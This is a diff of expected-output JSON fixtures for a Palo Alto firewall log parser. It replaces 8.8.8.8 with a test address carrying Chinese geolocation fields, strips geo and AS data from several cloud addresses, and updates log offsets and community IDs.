+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -9078,7 +8865,7 @@
         "event.end": "2018-11-30T16:09:16.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:16.000-02:00",
         "event.timezone": "-02:00",
@@ -9090,12 +8877,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 38014,
+        "log.offset": 38514,
         "network.application": "dns",
         "network.bytes": 200,
         "network.community_id": [
-            "1:UKGEn5x2xKPJhb0aLNUd3IM2xP0=",
-            "1:rh7nCIUBzUAekx4F+OTwBbpRh+E="
+            "1:BnKHQDJv1OGtE9i+aGd3gRM75p8=",
+            "1:hn4GD+5fvFkKh5CY1I/tGUl70ps="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -9112,12 +8899,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24236",
-        "panw.panos.network.nat.community_id": "1:rh7nCIUBzUAekx4F+OTwBbpRh+E=",
+        "panw.panos.network.nat.community_id": "1:hn4GD+5fvFkKh5CY1I/tGUl70ps=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091194,
         "panw.panos.source.interface": "ethernet1/2",
@@ -9132,14 +8919,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 116,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -9164,17 +8951,18 @@
         "client.nat.port": 57872,
         "client.packets": 1,
         "client.port": 30570,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 96,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -9188,7 +8976,7 @@
         "event.end": "2018-11-30T16:09:16.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:16.000-02:00",
         "event.timezone": "-02:00",
@@ -9200,12 +8988,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 38463,
+        "log.offset": 38973,
         "network.application": "dns",
         "network.bytes": 160,
         "network.community_id": [
-            "1:7WDGZhY7X3GTZLGCIDWzxK5juF4=",
-            "1:eIIc+AXkJtZLyfNqUAVZLumaYVQ="
+            "1:MBYdQDSxHvBa6iAwYROKM5oT9cM=",
+            "1:rLkKmC5eKNwFkylsF3ox4VOALUI="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -9222,12 +9010,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24276",
-        "panw.panos.network.nat.community_id": "1:eIIc+AXkJtZLyfNqUAVZLumaYVQ=",
+        "panw.panos.network.nat.community_id": "1:MBYdQDSxHvBa6iAwYROKM5oT9cM=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091195,
         "panw.panos.source.interface": "ethernet1/2",
@@ -9242,14 +9030,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 96,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -9275,17 +9063,7 @@
         "client.packets": 8,
         "client.port": 52497,
         "destination.address": "50.19.85.24",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 654,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "50.19.85.24",
         "destination.nat.ip": "50.19.85.24",
         "destination.nat.port": 443,
@@ -9313,7 +9091,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 38911,
+        "log.offset": 39431,
         "network.application": "ssl",
         "network.bytes": 1754,
         "network.community_id": [
@@ -9388,17 +9166,7 @@
         "client.packets": 8,
         "client.port": 52498,
         "destination.address": "50.19.85.24",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 654,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "50.19.85.24",
         "destination.nat.ip": "50.19.85.24",
         "destination.nat.port": 443,
@@ -9426,7 +9194,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 39403,
+        "log.offset": 39923,
         "network.application": "ssl",
         "network.bytes": 1754,
         "network.community_id": [
@@ -9501,17 +9269,7 @@
         "client.packets": 8,
         "client.port": 52496,
         "destination.address": "50.19.85.24",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 654,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "50.19.85.24",
         "destination.nat.ip": "50.19.85.24",
         "destination.nat.port": 443,
@@ -9539,7 +9297,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 39895,
+        "log.offset": 40415,
         "network.application": "ssl",
         "network.bytes": 1754,
         "network.community_id": [
@@ -9614,14 +9372,7 @@
         "client.packets": 12,
         "client.port": 52510,
         "destination.address": "104.254.150.9",
-        "destination.as.number": 29990,
-        "destination.as.organization.name": "AppNexus, Inc",
         "destination.bytes": 7820,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.254.150.9",
         "destination.nat.ip": "104.254.150.9",
         "destination.nat.port": 443,
@@ -9649,7 +9400,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 40387,
+        "log.offset": 40907,
         "network.application": "ssl",
         "network.bytes": 10511,
         "network.community_id": [
@@ -9724,17 +9475,7 @@
         "client.packets": 8,
         "client.port": 52495,
         "destination.address": "50.19.85.24",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 654,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "50.19.85.24",
         "destination.nat.ip": "50.19.85.24",
         "destination.nat.port": 443,
@@ -9762,7 +9503,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 40885,
+        "log.offset": 41405,
         "network.application": "ssl",
         "network.bytes": 1754,
         "network.community_id": [
@@ -9837,17 +9578,7 @@
         "client.packets": 4,
         "client.port": 52486,
         "destination.address": "52.0.218.108",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 214,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.0.218.108",
         "destination.nat.ip": "52.0.218.108",
         "destination.nat.port": 443,
@@ -9875,7 +9606,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 41376,
+        "log.offset": 41896,
         "network.application": "incomplete",
         "network.bytes": 490,
         "network.community_id": [
@@ -9950,17 +9681,7 @@
         "client.packets": 4,
         "client.port": 52489,
         "destination.address": "52.6.117.19",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 214,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.6.117.19",
         "destination.nat.ip": "52.6.117.19",
         "destination.nat.port": 443,
@@ -9988,7 +9709,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 41845,
+        "log.offset": 42365,
         "network.application": "incomplete",
         "network.bytes": 490,
         "network.community_id": [
@@ -10063,17 +9784,7 @@
         "client.packets": 4,
         "client.port": 52490,
         "destination.address": "34.238.96.22",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 214,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "34.238.96.22",
         "destination.nat.ip": "34.238.96.22",
         "destination.nat.port": 443,
@@ -10101,7 +9812,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 42312,
+        "log.offset": 42832,
         "network.application": "incomplete",
         "network.bytes": 490,
         "network.community_id": [
@@ -10176,17 +9887,7 @@
         "client.packets": 4,
         "client.port": 52493,
         "destination.address": "130.211.47.17",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 280,
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.4043,
-        "destination.geo.location.lon": -122.0748,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "130.211.47.17",
         "destination.nat.ip": "130.211.47.17",
         "destination.nat.port": 443,
@@ -10214,7 +9915,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 42781,
+        "log.offset": 43301,
         "network.application": "incomplete",
         "network.bytes": 556,
         "network.community_id": [
@@ -10288,17 +9989,18 @@
         "client.nat.port": 13490,
         "client.packets": 1,
         "client.port": 59320,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 172,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -10312,7 +10014,7 @@
         "event.end": "2018-11-30T16:09:18.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:18.000-02:00",
         "event.timezone": "-02:00",
@@ -10324,12 +10026,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 43252,
+        "log.offset": 43772,
         "network.application": "dns",
         "network.bytes": 269,
         "network.community_id": [
-            "1:5G+JVi/ClM/MfHhUL//vH/GmuaA=",
-            "1:n/IZF37E/7cErtK4po3ewuEQScY="
+            "1:iFOe1PdUY9r8dwKaxQH+8rrvnAI=",
+            "1:zJk1JtAystoTBaVlRntBCcIln4Q="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -10346,12 +10048,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24281",
-        "panw.panos.network.nat.community_id": "1:5G+JVi/ClM/MfHhUL//vH/GmuaA=",
+        "panw.panos.network.nat.community_id": "1:iFOe1PdUY9r8dwKaxQH+8rrvnAI=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091205,
         "panw.panos.source.interface": "ethernet1/2",
@@ -10366,14 +10068,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 172,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -10398,17 +10100,18 @@
         "client.nat.port": 0,
         "client.packets": 6,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 588,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 6,
         "destination.port": 0,
@@ -10422,7 +10125,7 @@
         "event.end": "2018-11-30T16:09:37.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:37.000-02:00",
         "event.timezone": "-02:00",
@@ -10434,12 +10137,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 43701,
+        "log.offset": 44231,
         "network.application": "ping",
         "network.bytes": 1176,
         "network.community_id": [
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
-            "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+            "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
         ],
         "network.direction": "outbound",
         "network.packets": 12,
@@ -10456,12 +10159,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24424",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091206,
         "panw.panos.source.interface": "ethernet1/2",
@@ -10476,14 +10179,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 588,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 6,
         "server.port": 0,
@@ -10508,17 +10211,18 @@
         "client.nat.port": 53751,
         "client.packets": 1,
         "client.port": 13076,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 94,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -10532,7 +10236,7 @@
         "event.end": "2018-11-30T16:09:19.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:19.000-02:00",
         "event.timezone": "-02:00",
@@ -10544,12 +10248,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 44145,
+        "log.offset": 44685,
         "network.application": "dns",
         "network.bytes": 172,
         "network.community_id": [
-            "1:jKueIOIhkRRjHQyRO93QyuKEiP8=",
-            "1:mdksC4jGw6MN7g3nGdquiqQ95vU="
+            "1:+EKGNDzaa2Gmys4Gdwo/EIwHp2s=",
+            "1:80NRQY9qT1RcwPXjJAnXbR/Cnx8="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -10566,12 +10270,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24230",
-        "panw.panos.network.nat.community_id": "1:mdksC4jGw6MN7g3nGdquiqQ95vU=",
+        "panw.panos.network.nat.community_id": "1:80NRQY9qT1RcwPXjJAnXbR/Cnx8=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091207,
         "panw.panos.source.interface": "ethernet1/2",
@@ -10586,14 +10290,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 94,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -10618,17 +10322,18 @@
         "client.nat.port": 21643,
         "client.packets": 1,
         "client.port": 5511,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 170,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -10642,7 +10347,7 @@
         "event.end": "2018-11-30T16:09:19.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
